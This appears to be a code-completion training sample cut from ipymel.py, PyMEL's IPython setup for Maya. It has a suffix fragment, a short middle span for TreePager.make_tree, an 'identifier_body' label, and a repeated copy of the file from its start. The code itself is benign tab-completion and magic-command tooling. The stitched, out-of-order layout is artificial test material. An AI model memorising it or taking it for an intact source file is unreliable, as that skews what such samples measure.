color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]' % nn)
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def sigint_plugin_loaded_callback(*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler()
sigint_plugin_loaded_callback_id = None
DAG_MAGIC_COMPLETER_RE = re.compile(r"(?P<preamble>%dag\s+)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)*)(?P<current_part>[a-zA-Z0-9:_]*))$")
DAG_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)+)(?P<current_part>[a-zA-Z0-9:_]*))$")
NAME_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_.]*(\.|\|))*)(?P<current_part>[a-zA-Z0-9:_]*))$")
ATTR_RE = re.compile(r"""(?P<prefix>[a-zA-Z_0-9|:.]+)\.(?P<partial_attr>\w*)$""")
def setup(shell):
global ip
if hasattr(shell, 'get_ipython'):
ip = shell.get_ipython()
else:
ip = get_ipython()
ip.set_hook('complete_command', pymel_python_completer, re_key="(?!{})".format(NAME_COMPLETER_RE.pattern))
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_MAGIC_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_name_completer, re_key=NAME_COMPLETER_RE.pattern)
ip.set_hook('complete_command', open_completer, str_key="openf")
ip.ex("from pymel.core import *")
# stuff in __main__ is not necessarily in ipython's 'main' namespace... so
# if the user has something in userSetup.py that he wants put in the
# "interactive" namespace, it won't be - unless we do this:
ip.ex('from __main__ import *')
# if you don't want pymel imported into the main namespace, you can replace the above with something like:
#ip.ex("import pymel as pm")
define_magic(ip, openf)
define_magic(ip, dag)
define_magic(ip, dghist)
# add projects
ip.ex("""
import os.path
for _mayaproj in optionVar.get('RecentProjectsList', []):
_mayaproj = os.path.join( _mayaproj, 'scenes' )
if _mayaproj not in _dh:
_dh.append(_mayaproj)""")
# add files
ip.ex("""
import os.path
_sh=[]
for _mayaproj in optionVar.get('RecentFilesList', []):
if _mayaproj not in _sh:
_sh.append(_mayaproj)""")
# setup a handler for ctrl-c / SIGINT / KeyboardInterrupt, so maya / ipymel
# doesn't quit
install_sigint_handler(force=True)
# unfortunately, when Mental Ray loads, it installs a new SIGINT handler
# which restores the old "bad" behavior... need to install a plugin callback
# to restore ours...
global sigint_plugin_loaded_callback_id
import pymel.core as pm
if sigint_plugin_loaded_callback_id is None:
sigint_plugin_loaded_callback_id = pm.api.MSceneMessage.addStringArrayCallback(
pm.api.MSceneMessage.kAfterPluginLoad,
sigint_plugin_loaded_callback)
def main():
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver >= [1, 0]:
import IPython.terminal.ipapp
app = IPython.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
elif ipy_ver >= [0, 11]:
import IPython.frontend.terminal.ipapp
app = IPython.frontend.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
else:
import IPython.Shell
shell = IPython.Shell.start()
setup(shell)
shell.mainloop()
if __name__ == '__main__':
main()
| num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree | identifier_body |
ipymel.py | """
pymel ipython configuration
Current Features
----------------
tab completion of depend nodes, dag nodes, and attributes
automatic import of pymel
Future Features
---------------
- tab completion of PyNode attributes
- color coding of tab complete options
- to differentiate between methods and attributes
- dag nodes vs depend nodes
- shortNames vs longNames
- magic commands
- bookmarking of maya's recent project and files
To Use
------
place in your PYTHONPATH
add the following line to the 'main' function of $HOME/.ipython/ipy_user_conf.py::
import ipymel
Author: Chad Dombrova
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from past.builtins import basestring
from builtins import object
from optparse import OptionParser
try:
import maya
except ImportError as e:
print("ipymel can only be setup if the maya package can be imported")
raise e
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver < [0, 11]:
def get_ipython():
import IPython.ipapi
return IPython.ipapi.get()
IPython.ipapi.IPApi.define_magic = IPython.ipapi.IPApi.expose_magic
import IPython.ColorANSI as coloransi
from IPython.genutils import page
from IPython.ipapi import UsageError
import IPython.Extensions.ipy_completers
def get_colors(obj):
return color_table[obj.rc.colors].colors
else: # >= [0, 11]
import IPython.utils.coloransi as coloransi
from IPython.core.page import page
from IPython.core.error import UsageError
def get_colors(obj):
return color_table[ip.colors].colors
if ipy_ver >= [0, 13]:
def define_magic(interpreter, function):
def get_ipython():
return interpreter
from IPython.core.magic import register_line_magic
register_line_magic(function)
else:
def define_magic(interpreter, function):
interpreter.define_magic(function.__name__, function)
try:
from IPython.core.error import TryNext
except ImportError:
from IPython.ipapi import TryNext
Colors = coloransi.TermColors
ColorScheme = coloransi.ColorScheme
ColorSchemeTable = coloransi.ColorSchemeTable
ip = None
try:
import readline
except ImportError:
import pyreadline as readline
delim = readline.get_completer_delims()
delim = delim.replace('|', '') # remove pipes
delim = delim.replace(':', '') # remove colon
# delim = delim.replace("'", '') # remove quotes
# delim = delim.replace('"', '') # remove quotes
readline.set_completer_delims(delim)
import inspect
import re
import glob
import os
import shlex
import sys
# don't import pymel here, as this will trigger loading of maya/pymel
# immediately, and things in the userSetup.py won't get properly entered into
# the ipython shell's namespace... we need the startup of maya to happen
# from "within" ipython, ie, when we do:
# ip.ex("from pymel.core import *")
# from pymel import core
# we also can't even use maya.cmds, because it doesn't work in anything other
# than the main thread... and most of the tab-completion stuff runs in a
# subthread... so api it is!
# Use api2 because it's faster...
import maya.api.OpenMaya as om
_scheme_default = 'Linux'
# Build a few color schemes
NoColor = ColorScheme(
'NoColor', {
'instance': Colors.NoColor,
'collapsed': Colors.NoColor,
'tree': Colors.NoColor,
'transform': Colors.NoColor,
'shape': Colors.NoColor,
'nonunique': Colors.NoColor,
'nonunique_transform': Colors.NoColor,
'normal': Colors.NoColor # color off (usu. Colors.Normal)
})
LinuxColors = ColorScheme(
'Linux', {
'instance': Colors.LightCyan,
'collapsed': Colors.Yellow,
'tree': Colors.Green,
'transform': Colors.White,
'shape': Colors.LightGray,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
LightBGColors = ColorScheme(
'LightBG', {
'instance': Colors.Cyan,
'collapsed': Colors.LightGreen,
'tree': Colors.Blue,
'transform': Colors.DarkGray,
'shape': Colors.Black,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
# Build table of color schemes (needed by the dag_parser)
color_table = ColorSchemeTable([NoColor, LinuxColors, LightBGColors],
_scheme_default)
color_table['Neutral'] = LightBGColors
def splitDag(obj):
buf = obj.split('|')
tail = buf[-1]
path = '|'.join(buf[:-1])
return path, tail
def expand(obj):
"""
allows for completion of objects that reside within a namespace. for example,
``tra*`` will match ``trak:camera`` and ``tram``
for now, we will hardwire the search to a depth of three recursive namespaces.
TODO:
add some code to determine how deep we should go
"""
return (obj + '*', obj + '*:*', obj + '*:*:*')
def api_ls(args, dagOnly, long=False):
'''Because the tab completer runs in a subthread, and cmds.ls doesn't
seem to work very well from a subthread, use maya.api.OpenMaya'''
sel = om.MSelectionList()
if isinstance(args, basestring):
args = [args]
for arg in args:
# if it doesn't exist, MSelectionList.add will raise an error -
# ignore that
try:
sel.add(arg)
except Exception:
pass
if not long and not dagOnly:
return list(sel.getSelectionStrings())
# long is only used when getting nodes, not plugs, so ignore that case
# for now...
results = []
mfnDep = om.MFnDependencyNode()
for i in range(sel.length()):
try:
dagPath = sel.getDagPath(i)
except TypeError:
if dagOnly:
continue
mobj = sel.getDependNode(i)
mfnDep.setObject(mobj)
results.append(mfnDep.name())
else:
if long:
results.append(dagPath.fullPathName())
else:
results.append(dagPath.partialPathName())
return results
def api_children(path):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get it's children
else:
matches = get_children(nametext, dagOnly)
if not matches:
raise TryNext
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]' % nn)
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def sigint_plugin_loaded_callback(*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler() | sigint_plugin_loaded_callback_id = None
DAG_MAGIC_COMPLETER_RE = re.compile(r"(?P<preamble>%dag\s+)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)*)(?P<current_part>[a-zA-Z0-9:_]*))$")
DAG_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)+)(?P<current_part>[a-zA-Z0-9:_]*))$")
NAME_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_.]*(\.|\|))*)(?P<current_part>[a-zA-Z0-9:_]*))$")
ATTR_RE = re.compile(r"""(?P<prefix>[a-zA-Z_0-9|:.]+)\.(?P<partial_attr>\w*)$""")
def setup(shell):
global ip
if hasattr(shell, 'get_ipython'):
ip = shell.get_ipython()
else:
ip = get_ipython()
ip.set_hook('complete_command', pymel_python_completer, re_key="(?!{})".format(NAME_COMPLETER_RE.pattern))
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_MAGIC_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_name_completer, re_key=NAME_COMPLETER_RE.pattern)
ip.set_hook('complete_command', open_completer, str_key="openf")
ip.ex("from pymel.core import *")
# stuff in __main__ is not necessarily in ipython's 'main' namespace... so
# if the user has something in userSetup.py that he wants put in the
# "interactive" namespace, it won't be - unless we do this:
ip.ex('from __main__ import *')
# if you don't want pymel imported into the main namespace, you can replace the above with something like:
#ip.ex("import pymel as pm")
define_magic(ip, openf)
define_magic(ip, dag)
define_magic(ip, dghist)
# add projects
ip.ex("""
import os.path
for _mayaproj in optionVar.get('RecentProjectsList', []):
_mayaproj = os.path.join( _mayaproj, 'scenes' )
if _mayaproj not in _dh:
_dh.append(_mayaproj)""")
# add files
ip.ex("""
import os.path
_sh=[]
for _mayaproj in optionVar.get('RecentFilesList', []):
if _mayaproj not in _sh:
_sh.append(_mayaproj)""")
# setup a handler for ctrl-c / SIGINT / KeyboardInterrupt, so maya / ipymel
# doesn't quit
install_sigint_handler(force=True)
# unfortunately, when Mental Ray loads, it installs a new SIGINT handler
# which restores the old "bad" behavior... need to install a plugin callback
# to restore ours...
global sigint_plugin_loaded_callback_id
import pymel.core as pm
if sigint_plugin_loaded_callback_id is None:
sigint_plugin_loaded_callback_id = pm.api.MSceneMessage.addStringArrayCallback(
pm.api.MSceneMessage.kAfterPluginLoad,
sigint_plugin_loaded_callback)
def main():
import IPython
ipy_ver = IPython.__version__.split('.')
